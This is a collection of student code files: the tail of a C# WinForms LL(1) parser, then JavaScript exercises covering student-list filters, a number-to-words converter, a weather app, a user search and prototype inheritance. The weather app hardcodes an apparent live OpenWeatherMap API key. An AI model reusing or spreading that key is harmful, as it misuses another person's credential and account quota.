MessageBox.Show("请先输入符号串");
return;
}
processList.Clear();
dgvResult.DataSource = null;
            // build the result DataGridView
dgvResult.Location = new Point(470, 195);
this.Controls.Add(dgvResult);
            // DataGridView properties
dgvResult.Font = new Font("Consolas", 8, dgvAnalysis.Font.Style);
dgvResult.RowHeadersVisible = false;
Process process1 = new Process();
process1.Index = 1;
process1.SymbolStack = "#S";
process1.InputString = symbolString;
process1.Production = "S->A";
processList.Add(process1);
string stack_symbol = "#S";
string input_str = symbolString;
string production = "S->A";
for (int i = 2; ; i++)
{
//得到新的符号栈stack_symbol
if (production == "")
{
                    // if the top of the symbol stack equals the first input symbol, match (pop and advance); otherwise report an error
if (stack_symbol[stack_symbol.Length - 1] == input_str[0])
{
stack_symbol = stack_symbol.Substring(0, stack_symbol.Length - 1);
input_str = input_str.Substring(1);
}
else
{
MessageBox.Show("查找失败");
showWarn(false);
}
}
else
{
if (stack_symbol[stack_symbol.Length - 1] != '\'')
{
stack_symbol = stack_symbol.Substring(0, stack_symbol.Length - 1);
}
else stack_symbol = stack_symbol.Substring(0, stack_symbol.Length - 2);
string[] pro = production.Split('>');
stack_symbol += prod2symbol(pro[1]);
}
string symboltmp="";
if(stack_symbol[stack_symbol.Length-1]!='\''){
symboltmp+=stack_symbol[stack_symbol.Length-1];
} else symboltmp=stack_symbol[stack_symbol.Length-2]+""
+stack_symbol[stack_symbol.Length-1];
string inputStrtmp="";
inputStrtmp+=input_str[0];
if (symboltmp == "#" && inputStrtmp == "#")
{
production = "OK";
Process process = new Process();
process.Index = i;
process.SymbolStack = stack_symbol;
process.InputString = input_str;
process.Production = production;
processList.Add(process);
showWarn(true);
break;
}
else if (symboltmp == inputStrtmp)
{
production = "";
Process process = new Process();
process.Index = i;
process.SymbolStack = stack_symbol;
process.InputString = input_str;
process.Production = production;
processList.Add(process);
}
else
{
int r = 0, c = 0;
for (int row = 0; row <= 5; row++)
{
if (dgvAnalysis.Rows[row].Cells[0].Value.ToString().Equals(symboltmp))
{
r = row;
break;
}
}
for (int col = 1; col <= 6; col++)
{
if (dgvAnalysis.Columns[col].HeaderText.Equals(inputStrtmp))
{
c = col;
break;
}
}
if (r == 5 && c == 6)
{
MessageBox.Show("查找失败!");
showWarn(false);
break;
}
else
{
production = dgvAnalysis.Rows[r].Cells[c].Value.ToString();
if (production != "error")
{
Process process = new Process();
process.Index = i;
process.SymbolStack = stack_symbol;
process.InputString = input_str;
process.Production = production;
processList.Add(process);
}
else
{
Process process = new Process();
process.Index = i;
process.SymbolStack = stack_symbol;
process.InputString = input_str;
process.Production = "error!";
processList.Add(process);
MessageBox.Show("匹配失败");
showWarn(false);
break;
}
}
}
}
if (processList.Count < 10)
{
int high = 24 * (processList.Count + 1)-processList.Count/2-1;
dgvResult.Size = new Size(404, high);
}
else dgvResult.Size = new Size(420, 230);
this.dgvResult.AllowUserToAddRows = false;
this.dgvResult.DataSource = processList;
dgvResult.Columns[0].HeaderText = "步骤";
dgvResult.Columns[1].HeaderText = "符号栈S[i]";
dgvResult.Columns[2].HeaderText = "输入串str[j]";
dgvResult.Columns[3].HeaderText = "产生式";
dgvResult.Columns[2].DefaultCellStyle.Alignment = DataGridViewContentAlignment.MiddleRight;
}
private string prod2symbol(string p)
{
string stmp="";
int len = p.Length;
for (int i = len-1; i >=0; i--)
{
if (p[i] == '\'')
{
stmp = stmp + p[i - 1] + p[i];
i--;
}
else if(p[i] != 'Ɛ')
{
stmp += p[i];
}
}
return stmp;
}
        // form initialisation
void initForm()
{
this.BackColor = Color.FromArgb(0xee, 0xf7, 0xff);
lblTitle = new Label();
lblTitle.Size = new Size(175, 25);
lblTitle.Location = new Point(270, 8);
//lblTitle.Left = (this.ClientRectangle.Width - lblTitle.Width) / 2;
//lblTitle.BringToFront();
this.Controls.Add(lblTitle);
lblGrammer = new Label();
lblGrammer.Location = new Point(12, 36);
lblGrammer.Size = new Size(40, 16);
this.Controls.Add(lblGrammer);
rtbGrammer = new RichTextBox();
rtbGrammer.Location = new Point(12, 52);
rtbGrammer.Size = new Size(200, 150);
rtbGrammer.BackColor = Color.White;
rtbGrammer.ReadOnly = true;
this.Controls.Add(rtbGrammer);
lblAnalysisTable = new Label();
lblAnalysisTable.Location = new Point(12, 210);
lblAnalysisTable.Size = new Size(56, 16);
this.Controls.Add(lblAnalysisTable);
dgvAnalysis = new DataGridView();
dgvAnalysis.Location = new Point(12, 226);
dgvAnalysis.Size = new Size(300, 140);
this.Controls.Add(dgvAnalysis);
lblSymbolString = new Label();
lblSymbolString.Location = new Point(350, 36);
lblSymbolString.Size = new Size(200, 16);
this.Controls.Add(lblSymbolString);
tbSymbolString = new TextBox();
tbSymbolString.Location = new Point(350, 52);
tbSymbolString.Size = new Size(250, 16);
this.Controls.Add(tbSymbolString);
btnAnalysis = new Button();
btnAnalysis.Location = new Point(350, 90);
btnAnalysis.Size = new Size(80, 24);
btnAnalysis.BackColor = Color.White;
btnAnalysis.ForeColor = Color.FromArgb(0x44, 0xaa, 0xff);
this.Controls.Add(btnAnalysis);
lblResult = new Label();
lblResult.Location = new Point(350, 130);
lblResult.Size = new Size(100, 16);
this.Controls.Add(lblResult);
dgvResult = new DataGridView();
lblwarn = new Label();
lblwarn.Size = new Size(60, 16);
lblwarn.Location = new Point(470, 430);
}
        // data initialisation
void initData()
{
lblTitle.Font = new Font("Consolas", 18);
lblTitle.Text = "LL(1)语法分析程序";
this.Font = new Font("宋体", 12);
lblGrammer.Text = "文法";
rtbGrammer.Font = new Font("Consolas", 10, rtbGrammer.Font.Style);
rtbGrammer.Text = "S->A\r\nA->BA'\r\nA'->iBA'|Ɛ\r\nB->CB'\r\nB'->+CB'|Ɛ\r\nC->)A*|(";
lblAnalysisTable.Text = "分析表";
dgvAnalysis.ColumnHeadersDefaultCellStyle.Font = new Font("Consolas", 8, dgvAnalysis.Font.Style);
dgvAnalysis.RowsDefaultCellStyle.Font = new Font("Consolas", 8, dgvAnalysis.Font.Style);
DataTable dt = new DataTable();
dt.Columns.Add(new DataColumn("(非)终结符", typeof(string)));
dt.Columns.Add(new DataColumn("i", typeof(string)));
dt.Columns.Add(new DataColumn("+", typeof(string)));
dt.Columns.Add(new DataColumn("*", typeof(string)));
dt.Columns.Add(new DataColumn("(", typeof(string)));
dt.Columns.Add(new DataColumn(")", typeof(string)));
dt.Columns.Add(new DataColumn("#", typeof(string)));
            DataRow dr; // row
dr = dt.NewRow();
dr[0] = "S";
dr[1] = "error";
dr[2] = "error";
dr[3] = "error";
dr[4] = "S->A";
dr[5] = "S->A'";
dr[6] = "error";
dt.Rows.Add(dr);
dr = dt.NewRow();
dr[0] = "A";
dr[1] = "error";
dr[2] = "error";
dr[3] = "error";
dr[4] = "A->BA'";
dr[5] = "A->BA'";
dr[6] = "error";
dt.Rows.Add(dr);
dr = dt.NewRow();
dr[0] = "A'";
dr[1] = "A'->iBA'";
dr[2] = "error";
dr[3] = "A'->Ɛ";
dr[4] = "error";
dr[5] = "error";
dr[6] = "A'->Ɛ";
dt.Rows.Add(dr);
dr = dt.NewRow();
dr[0] = "B";
dr[1] = "error";
dr[2] = "error";
dr[3] = "error";
dr[4] = "B->CB'";
dr[5] = "B->CB'";
dr[6] = "error";
dt.Rows.Add(dr);
dr = dt.NewRow();
dr[0] = "B'";
dr[1] = "B'->Ɛ";
dr[2] = "B'->+CB'";
dr[3] = "B'->Ɛ";
dr[4] = "error";
dr[5] = "error";
dr[6] = "B'->Ɛ";
dt.Rows.Add(dr);
dr = dt.NewRow();
dr[0] = "C";
dr[1] = "error";
dr[2] = "error";
dr[3] = "error";
dr[4] = "C->(";
dr[5] = "C->)A*";
dr[6] = "error";
dt.Rows.Add(dr);
dgvAnalysis.DataSource = dt;
dgvAnalysis.Columns[0].Width = 55;
dgvAnalysis.Columns[0].SortMode = DataGridViewColumnSortMode.NotSortable;
for (int i = 1; i < 7; i++)
{
dgvAnalysis.Columns[i].Width = 57;
dgvAnalysis.Columns[i].SortMode = DataGridViewColumnSortMode.NotSortable;
}
dgvAnalysis.RowHeadersVisible = false;
dgvAnalysis.RowTemplate.Height = 25;
dgvAnalysis.ColumnHeadersHeight = 35;
dgvAnalysis.RowHeadersWidth = 50;
dgvAnalysis.DefaultCellStyle.Alignment = DataGridViewContentAlignment.MiddleCenter;
dgvAnalysis.ColumnHeadersDefaultCellStyle.Alignment = DataGridViewContentAlignment.MiddleCenter;
this.dgvAnalysis.AllowUserToAddRows = false;
dgvAnalysis.ReadOnly = true;
lblSymbolString.Text = "请输入要分析的符号串,以#结束";
btnAnalysis.Font = new Font(btnAnalysis.Font, FontStyle.Bold);
btnAnalysis.Text = "开始分析";
lblResult.Text = "分析结果:";
}
// Label indicating whether the analysis succeeded or failed
void showWarn(bool b){
if (b)
{
lblwarn.Text = "成功!";
lblwarn.ForeColor = Color.Green;
}
else
{
lblwarn.Text = "失败!";
lblwarn.ForeColor = Color.Red;
}
this.Controls.Add(lblwarn);
}
}
}
|
9e042b8a39a3ec5e026e92f9851ff3d39155924b
|
[
"Markdown",
"C#"
] | 3
|
Markdown
|
tianqy/ll1_syntax_analysis
|
8c8e3b9aaf7618632aa923333fbd6c5dca240856
|
f710cfad6bc9071134a32005555264fc4d3608f3
|
refs/heads/master
|
<file_sep>let display = document.getElementById("display");
let gradeHigher3 = document.getElementById("gradeHigher3");
let femaleWithGrade5 = document.getElementById("femaleWithGrade5");
let maleSkoje18 = document.getElementById("maleSkoje18");
let femaleOver24 = document.getElementById("femaleOver24");
let maleOver2StartsB = document.getElementById("maleOver2StartsB");
fetch("https://raw.githubusercontent.com/sedc-codecademy/skwd9-04-ajs/main/Samples/students_v2.json")
.then(function(response){
return response.json();
}).then(function(response){
gradeHigher3.addEventListener('click',function(){
displayResults(studentsWithAverageHigherThan3(response), display, gradeHigher3);
});
femaleWithGrade5.addEventListener('click',function(){
displayResults(femaleStudentsWithAverage5(response), display, femaleWithGrade5);
});
maleSkoje18.addEventListener('click',function(){
displayResults(maleWhoLiveInSkopjeOver18(response), display, maleSkoje18);
});
femaleOver24.addEventListener('click',function(){
displayResults(averageGradeOfFemalesOver24(response), display, femaleOver24);
});
maleOver2StartsB.addEventListener('click',function(){
displayResults(maleWithNameBAndGradeOver2(response), display, maleOver2StartsB);
});
});
function studentsWithAverageHigherThan3(students){
let averageGradeHigherThan3 = students
.filter(student=> student.averageGrade>3)
.map((student,index) => `${index+1}. ${student.firstName} ${student.lastName}`);
return averageGradeHigherThan3;
}
function femaleStudentsWithAverage5(students){
let femaleWhithAverage5 = students
.filter(student=> student.gender.toLowerCase() === 'female' && student.averageGrade === 5)
.map((student, index)=> `${index+1}. ${student.firstName} ${student.lastName}`);
return femaleWhithAverage5;
}
function maleWhoLiveInSkopjeOver18(students){
let skopjeMalesOver18 = students
.filter(student=> student.gender.toLowerCase() === 'male' && student.city.toLowerCase() === 'skopje' && student.age > 18)
.map((student, index)=> `${index+1}. ${student.firstName} ${student.lastName}`);
return skopjeMalesOver18;
}
function averageGradeOfFemalesOver24(students){
let femalesOver24Grades = students
.filter(student=> student.gender.toLowerCase() === 'female' && student.age > 24)
.map((student, index)=> `${index+1}. ${student.firstName} ${student.lastName} - Average Grade: ${student.averageGrade}`);
return femalesOver24Grades;
}
function maleWithNameBAndGradeOver2(students){
let malesThatStartWithBGradeOver2 = students
.filter(student=> student.gender.toLowerCase() === 'male' && student.averageGrade>2 && student.firstName[0] === 'B')
.map((student, index)=> `${index+1}. ${student.firstName} ${student.lastName}`);
return malesThatStartWithBGradeOver2;
}
function displayResults(students, display, btn){
    let html = `<b>${btn.innerText} :</b><ul>`;
    students.forEach(student => html += `<li style="list-style-type: none;">${student}</li>`);
    display.innerHTML = html + `</ul>`;
}
<file_sep>let calculatorInput = $("#calculatorInput");
let btn = $("#btn");
let display = $("#display");
//FUNCTIONS
function checkNumberValue(number){
temp = '';
switch (number) {
case 1:
temp = 'one';
break;
case 2:
temp = 'two';
break;
case 3:
temp = 'three';
break;
case 4:
temp = 'four';
break;
case 5:
temp = 'five';
break;
case 6:
temp = 'six';
break;
case 7:
temp = 'seven';
break;
case 8:
temp = 'eight';
break;
case 9:
temp = 'nine';
break;
case 10:
temp = 'ten';
break;
case 11:
temp = 'eleven';
break;
case 12:
temp = 'twelve';
break;
case 13:
temp = 'thirteen';
break;
case 14:
temp = 'fourteen';
break;
case 15:
temp = 'fifteen';
break;
case 16:
temp = 'sixteen';
break;
case 17:
temp = 'seventeen';
break;
case 18:
temp = 'eighteen';
break;
case 19:
temp = 'nineteen';
break;
case 20:
temp = 'twenty';
break;
case 30:
temp = 'thirty';
break;
case 40:
temp = 'forty';
break;
case 50:
temp = 'fifty';
break;
case 60:
temp = 'sixty';
break;
case 70:
temp = 'seventy';
break;
case 80:
temp = 'eighty';
break;
case 90:
temp = 'ninety';
break;
default:
temp = ' '
break;
}
return temp;
}//Finds the name
function separateDigits(number){
let array = [];
for(const digit of number){
array.push(parseInt(digit));
}
return array;
}//Returns an array with all the digits of a number
function lengthOne(display,number){
display.append(`${checkNumberValue(parseInt(number))}`);
}//One Digit Number
function lengthTwo(display,number){
if(number[0]>=2){
let temp = separateDigits(number);
temp[0]*=10;
if(temp[1] !== 0){
display.append(`
${checkNumberValue(temp[0])}-${checkNumberValue(temp[1])}`);
}else{
display.append(`${checkNumberValue(temp[0])}`);
}
}else{
number[0]*=10;
number[0]+=number[1];
lengthOne(display,number);
}
}//Two Digits Number
function lengthThree(display, number){
if(number[0] === 0){
number.splice(0,1);
lengthTwo(display, number);
}else{
let temp = separateDigits(number);
display.append(`${checkNumberValue(temp[0])} hundred `);
temp.splice(0,1);
lengthTwo(display, temp);
}
}//Hundred
function lengthFourFiveSix (display, number){
if(number[0] === 0){
number.splice(0,1);
if(number.length<=3){
lengthThree(display, number)
}else{
lengthFourFiveSix(display, number);
}
}else{
let temp = separateDigits(number);
switch (number.length) {
case 4:
display.append(`${checkNumberValue(temp[0])} thousand `);
temp.splice(0,1);
lengthThree(display, temp);
break;
case 5:
let twoDigits = [temp[0], temp[1]];
lengthTwo(display,twoDigits);
temp.splice(0,2);
display.append(` thousand `);
lengthThree(display, temp);
break;
case 6:
let threeDigits = [temp[0], temp[1], temp[2]];
lengthThree(display,threeDigits);
temp.splice(0,3);
display.append(` thousand `);
lengthThree(display,temp);
break;
default:
display.append('');
break;
}
}
}//Thousand
function lengthSevenEightNine(display, number){
if(number[0] === 0){
number.splice(0,1);
if(number.length<=3){
lengthThree(display, number)
}else if(number.length<=6){
lengthFourFiveSix(display, number);
}else{
lengthSevenEightNine(display,number);
}
}else{
let temp = separateDigits(number);
switch (number.length) {
case 7:
display.append(`${checkNumberValue(temp[0])} million `);
temp.splice(0,1);
lengthFourFiveSix(display,temp);
break;
case 8:
let twoDigits = [temp[0], temp[1]];
lengthTwo(display, twoDigits);
temp.splice(0,2);
display.append(` million `);
lengthFourFiveSix(display, temp);
break;
case 9:
let threeDigits = [temp[0], temp[1], temp[2]];
lengthThree(display, threeDigits);
temp.splice(0,3);
display.append(` million `);
lengthFourFiveSix(display, temp);
break;
default:
display.append('');
break;
}
}
}//Million
function lengthTenElevenTwelve(display, number){
if(number[0] === 0){
number.splice(0,1);
if(number.length<=3){
lengthThree(display, number)
}else if(number.length<=6){
lengthFourFiveSix(display, number);
}else if(number.length<=9){
lengthSevenEightNine(display,number);
}else{
lengthTenElevenTwelve(display,number);
}
}else{
let temp = separateDigits(number);
switch (number.length) {
case 10:
display.append(`${checkNumberValue(temp[0])} billion `);
temp.splice(0,1);
lengthSevenEightNine(display,temp);
break;
case 11:
let twoDigits = [temp[0], temp[1]];
lengthTwo(display, twoDigits);
temp.splice(0,2);
display.append(` billion `);
lengthSevenEightNine(display, temp);
break;
case 12:
let threeDigits = [temp[0], temp[1], temp[2]];
lengthThree(display, threeDigits);
temp.splice(0,3);
display.append(` billion `);
lengthSevenEightNine(display, temp);
break;
default:
display.append('');
break;
}
}
}//Billion
function lengthThirteenFourteenFifteen(display, number){
if(number[0] === 0){
number.splice(0,1);
if(number.length<=3){
lengthThree(display, number)
}else if(number.length<=6){
lengthFourFiveSix(display, number);
}else if(number.length<=9){
lengthSevenEightNine(display,number);
}else if(number.length<=12){
lengthTenElevenTwelve(display,number);
}else{
lengthThirteenFourteenFifteen(display, number);
}
}else{
let temp = separateDigits(number);
switch (number.length) {
case 13:
display.append(`${checkNumberValue(temp[0])} trillion `);
temp.splice(0,1);
lengthTenElevenTwelve(display,temp);
break;
case 14:
let twoDigits = [temp[0], temp[1]];
lengthTwo(display, twoDigits);
temp.splice(0,2);
display.append(` trillion `);
lengthTenElevenTwelve(display, temp);
break;
case 15:
let threeDigits = [temp[0], temp[1], temp[2]];
lengthThree(display, threeDigits);
temp.splice(0,3);
display.append(` trillion `);
lengthTenElevenTwelve(display, temp);
break;
default:
display.append('');
break;
}
}
}//Trillion
function findRange(display, number){
if(number<0){
display.css("color", "#b85454");
display.append('The number is negative');
}else if(parseInt(number) === 0){
display.append('zero');
}else if(number.length === 1){
lengthOne(display, number);
}else if(number.length === 2){
lengthTwo(display, number);
}else if(number.length === 3){
lengthThree(display, number)
}else if(number.length<=6 && number.length>=4){
lengthFourFiveSix(display, number);
}else if(number.length<=9 && number.length>=7){
lengthSevenEightNine(display, number);
}else if(number.length<=12 && number.length>=10){
lengthTenElevenTwelve(display, number);
}else if(number.length<=15 && number.length>=13){
lengthThirteenFourteenFifteen(display,number);
}else{
display.css("color", "#b85454");
display.append('The number is bigger than 999 999 999 999 999 (999+ trillion), or the input is not a valid number!');
}
}//Finds The Range And Prints Results
//EVENT LISTENERS
$(document).ready(function(){
$("#note").html(`<p>NUMBER TO WORDS CONVERTER<br>
*You can use only positive numbers, up to 999 trillion*</p>`)
})
btn.click(function(){
display.html("");
display.css("color", "#89939e");
findRange(display,calculatorInput.val());
})<file_sep>let navService = {
navItems: document.getElementsByClassName("nav-item"),
navSearch: document.getElementById("citySearchInput"),
searchBtn: document.getElementById("citySearchBtn"),
pages: document.getElementById("pages").children,
previousBtn: document.getElementById("previousBtn"),
nextBtn: document.getElementById("nextBtn"),
sortWindSpeed: document.getElementById("sortWindSpeed"),
month: new Date().getMonth(),
minutes: new Date().getMinutes(),
counterMinute: 0,
counterMonth: 0,
activateItem: function(item){
for(let navItem of this.navItems){
navItem.classList.remove("active");
}
item.classList.add("active");
},
showPage: function(page){
for(let pageElement of this.pages){
pageElement.style.display = "none";
}
page.style.display = "block";
},
checkAPIRestrictions: function(){
if(this.minutes !== new Date().getMinutes()) navService.counterMinute=0;
if(this.month !== new Date().getMonth()) navService.counterMonth=0;
console.log(this.counterMinute);
if(this.minutes === new Date().getMinutes() && navService.counterMinute>59) return false;
else if(this.month === new Date().getMonth() && navService.counterMonth>999999) return false;
else return true;
},
registerNavListeners: function(){
uiService.toggleLoader(true);
for(let i=0; i<this.navItems.length; i++){
this.navItems[i].addEventListener("click", function(){
navService.activateItem(this);
navService.showPage(navService.pages[i]);
})
}
this.searchBtn.addEventListener("click", function(event){
event.preventDefault();
uiService.toggleLoader(true);
weatherService.city = navService.navSearch.value;
weatherService.getDataAsync();
})
},
pagingHourly: function(data){
let currentPossition = 0;
let itemsShown = 10;
let numberOfListings = data.list.length;
if(currentPossition<= 0) navService.previousBtn.style.display = "none";
uiService.loadHourlyTable(data, currentPossition, itemsShown);
this.nextBtn.addEventListener('click', function(){
navService.previousBtn.style.display = "block";
currentPossition+=10;
itemsShown+=10;
uiService.loadHourlyTable(data, currentPossition, itemsShown);
if(numberOfListings<=itemsShown) navService.nextBtn.style.display = "none";
})
this.previousBtn.addEventListener('click', function(){
navService.nextBtn.style.display = "block";
currentPossition-=10;
itemsShown-=10;
uiService.loadHourlyTable(data, currentPossition, itemsShown);
if(currentPossition<= 0) navService.previousBtn.style.display = "none";
})
this.sortWindSpeed.addEventListener('click', function(){
let results = [];
for(let i=currentPossition; i<itemsShown; i++){
results.push(data.list[i]);
}
results.sort((a,b)=> a.wind.speed - b.wind.speed);
uiService.loadHourlyTableSorted(results);
})
}
};
let weatherService = {
apiKey: "9fadf053bb71e8c4a36d5943163d1642",
city: "skopje",
apiUrl: "https://api.openweathermap.org/data/2.5/",
getDataAsync: async function(){
if(navService.checkAPIRestrictions()){
try{
let data = await fetch(`${this.apiUrl}forecast?q=${this.city}&units=metric&appid=${this.apiKey}`);
let response = await data.json();
uiService.loadStatistics(await response);
navService.pagingHourly(await response);
uiService.statisticsCity.innerHTML = await response.city.name;
uiService.hdCity.innerHTML = await response.city.name;
navService.counterMinute++;
navService.counterMonth++;
uiService.toggleLoader(false);
this.getCircleDataAsync(await response.city.coord.lat, await response.city.coord.lon);
}
catch{
uiService.errorMessage('error');
uiService.toggleLoader(false);
}
}else{
uiService.errorMessage('restriction');
uiService.toggleLoader(false);
}
},
getCircleDataAsync: async function(lat, lon, cnt="5"){
let response = await fetch(`${weatherService.apiUrl}find?lat=${lat}&lon=${lon}&cnt=${cnt}&units=metric&appid=${weatherService.apiKey}`);
let data = await response.json();
uiService.citiesInCircle(await data);
uiService.itemsToShow.addEventListener('change', ()=>{
cnt = uiService.itemsToShow.value;
this.getCircleDataAsync(lat, lon, cnt);
})
},
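    // Single pass over the forecast list: accumulates temperature and humidity
    // sums for the averages while remembering the readings with the extreme values.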
agregateStatistics: function(data){
let list = data.list;
let highestTemperature = list[0];
let lowestTemperature = list[0];
let highestHumidity = list[0];
let lowestHumidity = list[0];
let temperatureSum = list.reduce((sum, reading)=> sum + reading.main.temp,0);
let humiditySum = list.reduce((sum, reading)=> sum + reading.main.humidity,0);
list.forEach(reading => {
if(highestTemperature.main.temp < reading.main.temp){
highestTemperature = reading;
}
if(lowestTemperature.main.temp > reading.main.temp){
lowestTemperature = reading;
}
if(highestHumidity.main.humidity < reading.main.humidity){
highestHumidity = reading;
}
if(lowestHumidity.main.humidity > reading.main.humidity){
lowestHumidity = reading;
}
});
return {
temperature:{
highest: highestTemperature.main.temp,
average: temperatureSum / list.length,
lowest: lowestTemperature.main.temp
},
humidity:{
highest: highestHumidity.main.humidity,
average: humiditySum / list.length,
lowest: lowestHumidity.main.humidity
},
warmestTime: helperService.unixTimeStampToDate(highestTemperature.dt),
coldestTime: helperService.unixTimeStampToDate(lowestTemperature.dt)
}
}
};
let uiService = {
statisticResult: document.getElementById("statisticsResult"),
tableResult: document.getElementById("tableResult"),
hdCity: document.getElementById("hdCity"),
statisticsCity: document.getElementById("statisticsCity"),
cityInCenter: document.getElementById("cityInCenter"),
citiesCircleResult: document.getElementById("citiesCircle"),
itemsToShow: document.getElementById("itemsToShow"),
loader: document.getElementById("loader"),
loadStatistics: function(data){
let statisticsData = weatherService.agregateStatistics(data);
this.statisticResult.innerHTML= `
<div class="mb-5">
<div class="row">
<div class="col-md-6">MAX TEMP: ${Math.round(statisticsData.temperature.highest)}C</div>
<div class="col-md-6">MAX HUMD: ${Math.round(statisticsData.humidity.highest)}%</div>
</div>
<div class="row">
<div class="col-md-6">AVG TEMP: ${statisticsData.temperature.average.toFixed(1)}C</div>
<div class="col-md-6">AVG HUMD: ${statisticsData.humidity.average.toFixed(2)}%</div>
</div>
<div class="row">
<div class="col-md-6">LOW TEMP: ${statisticsData.temperature.lowest}C</div>
<div class="col-md-6">LOW HUMD: ${statisticsData.humidity.lowest}%</div>
</div>
</div>
<h4>Warmest time of the following period: ${statisticsData.warmestTime.toDateString()}</h4>
<h4>Coldest time of the following period: ${statisticsData.coldestTime.toDateString()}</h4>
`;
},
loadHourlyTable: function(data, currentPossition, itemsShown){
uiService.tableResult.innerHTML = "";
for(let i=currentPossition; i<itemsShown; i++){
uiService.tableResult.innerHTML +=`
<div class="row">
<div class="col-md-2">
<img src="http://openweathermap.org/img/w/${data.list[i].weather[0].icon}.png" alt="weather-icon" >
</div>
<div class="col-md-2">${data.list[i].weather[0].description}</div>
<div class="col-md-2">${helperService.unixTimeStampToDate(data.list[i].dt).toDateString()}</div>
<div class="col-md-2">${data.list[i].main.temp}C (${data.list[i].main.feels_like}C)</div>
<div class="col-md-2">${data.list[i].main.humidity}</div>
<div class="col-md-2">${data.list[i].wind.speed}</div>
</div>
`
}
},
loadHourlyTableSorted: function(data){
this.tableResult.innerHTML = "";
data.forEach(reading => {
this.tableResult.innerHTML +=`
<div class="row">
<div class="col-md-2">
<img src="http://openweathermap.org/img/w/${reading.weather[0].icon}.png" alt="weather-icon" >
</div>
<div class="col-md-2">${reading.weather[0].description}</div>
<div class="col-md-2">${helperService.unixTimeStampToDate(reading.dt).toDateString()}</div>
<div class="col-md-2">${reading.main.temp}C (${reading.main.feels_like}C)</div>
<div class="col-md-2">${reading.main.humidity}</div>
<div class="col-md-2">${reading.wind.speed}</div>
</div>
`
});
},
citiesInCircle: function(data){
this.cityInCenter.innerHTML = data.list[0].name;
this.citiesCircleResult.innerHTML = "";
data.list.forEach((city, index)=> {
this.citiesCircleResult.innerHTML+=`
<div class="row">
<div class="col-md-2">${index+1}</div>
<div class="col-md-2">${city.name}</div>
<div class="col-md-2">${city.main.temp}</div>
<div class="col-md-2">${city.main.feels_like}</div>
<div class="col-md-2">${city.main.humidity}</div>
<div class="col-md-2">${city.main.pressure}</div>
</div>
`
});
},
toggleLoader: function(flag){
if(flag) this.loader.style.display = "block";
else this.loader.style.display = "none";
},
errorMessage: function(type){
if(type === 'restriction'){
$("#pages").after(`
<div class="error" style="background-color: white;">
<img src="./src/image/lock.png" alt="error" height="150px">
<h1>We apologize for your inconvenience! Please come back and try again.</h1>
<h3>There is a request limit per minute and per month, and it seems you've reached it!</h3>
<p>**The limit per minute is 60 searches!**</p>
<p>**The limit per month is 1M searches!**</p>
</div>
`);
}else{
$("#pages").after(`
<div class="error">
<img src="./src/image/error.png" alt="error" height="150px">
<h1>Something went wrong!</h1>
<h3>Refresh the page and try again!</h3>
</div>`);
}
}
};
let helperService = {
unixTimeStampToDate: function(unixTimeStamp){
return new Date(unixTimeStamp * 1000);
}
};
navService.registerNavListeners();
weatherService.getDataAsync();<file_sep>let display = $("#display");
let searchInput = $("#searchInput");
let searchBtn = $("#searchBtn");
function makeCall(url, callback){
$.ajax({
url: url,
success: function(response){
callback(response, searchInput.val().toLowerCase());
},
error: function(){
console.log('Something went wrong! Reload and try again!');
}
});
}
function printResults(results){
display.html("");
display.append(`
<tr>
<th>Name</th>
<th>Email</th>
<th>Phone</th>
</tr>`);
results.forEach(user => {
display.append(`
<tr>
<td>${user.name}</td>
<td>${user.email}</td>
<td>${user.phone}</td>
</tr>`);
});
display.append(`<div> Total ID sum: ${calculateIDSum(results)}</div>`);
}
function printSearchResults(results, search){
let result= [];
results.forEach(user=>{
if(user.name.toLowerCase() === search || user.email.toLowerCase() === search || user.phone.toLowerCase() === search){
result.push(user);
}
})
if(result.length === 0){
display.html("No results found!");
}else{
printResults(result);
}
}
function calculateIDSum(results){
let IDSum = results
.map(user=>user.id)
.reduce((sum, id) => sum+=id, 0);
return IDSum;
}
searchBtn.click(()=>{
makeCall("https://jsonplaceholder.typicode.com/users", printSearchResults);
})
makeCall("https://jsonplaceholder.typicode.com/users", printResults);<file_sep>function Person(firstName, lastName, age){
this.firstName = firstName;
this.lastName = lastName;
this.age = age;
this.getFullName = function(){
console.log(`${firstName} ${lastName}`);
}
}
function Student(firstName, lastName, age, academyName, studentId){
Object.setPrototypeOf(this, new Person(firstName, lastName, age));
this.academyName = academyName;
this.studentId = studentId;
this.study = function(){
console.log(`The student ${this.firstName} is studying in the ${this.academyName}`);
}
}
/* let student1 = new Student('John', 'Johnsky', 20, 'SEDC', 1);
let student2 = new Student('Greg', 'Gregsky', 25, 'someAcademy', 2 ); */
/* Student.prototype.getAcademyName = function(student){
console.log(student.academyName);
} */
/* Student.getAcademyName = function(){
console.log(`The student ${this.firstName} is in ${this.academyName} academy`);
}; */
//Is this correct?
/* Student.getAcademyName = function(student){
console.log(`The student ${student.firstName} is in ${student.academyName} academy.`);
} */
Person.prototype.checkForAcademy = function (student){
console.log(student.academyName);
}
function DesignStudent(firstName, lastName, age, studentId, isStudentOfTheMonth){
Object.setPrototypeOf(this, new Student(firstName, lastName, age,"Academy for Design", studentId));
this.isStudentOfTheMonth = isStudentOfTheMonth;
this.attendAdobeExam = function(){
console.log(`The student ${this.firstName} is doing an adobe exam!`);
}
}
function CodeStudent(firstName,lastName, age, studentId, hasIndividualProject, hasGroupProject){
Object.setPrototypeOf(this, new Student(firstName, lastName, age, "Academy for Web Development", studentId));
this.hasIndividualProject = hasIndividualProject;
this.hasGroupProject = hasGroupProject;
this.doProject = function(type){
if(type.toLowerCase() === 'individual'){
this.hasIndividualProject = true;
console.log(`The student ${this.firstName} ${this.lastName} is working on the ${type} project!`);
}else if(type.toLowerCase() === 'group'){
this.hasGroupProject = true;
console.log(`The student ${this.firstName} ${this.lastName} is working on the ${type} project!`);
}else console.log('Invalid type of project!');
}
}
function NetworkStudent(firstName, lastName, age, studentId, academyPart){
Object.setPrototypeOf(this, new Student(firstName, lastName, age, "Academy for Communication Networks and Security", studentId));
this.academyPart = academyPart;
this.attendCiscoExam = function(){
console.log(`The student ${this.firstName} is doing a Cisco exam!`);
}
}
let john = new DesignStudent('John', 'Johnsky', 23, 5, false);
let bob = new CodeStudent('Bob', 'Bobsky', 25, 23, true, false);
let greg = new NetworkStudent('Greg', 'Gregsky', 33, 34, 2);
/* Student.getAcademyName(john);
Student.getAcademyName(bob);
Student.getAcademyName(greg); */
john.checkForAcademy(john);
bob.checkForAcademy(bob);
greg.checkForAcademy(greg);
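/* A minimal, self-contained sketch (not part of the original homework) of the
   more conventional inheritance pattern the "Is this correct?" comment above is
   circling: call the parent constructor for own properties and link prototypes
   once, instead of re-parenting every instance with Object.setPrototypeOf.
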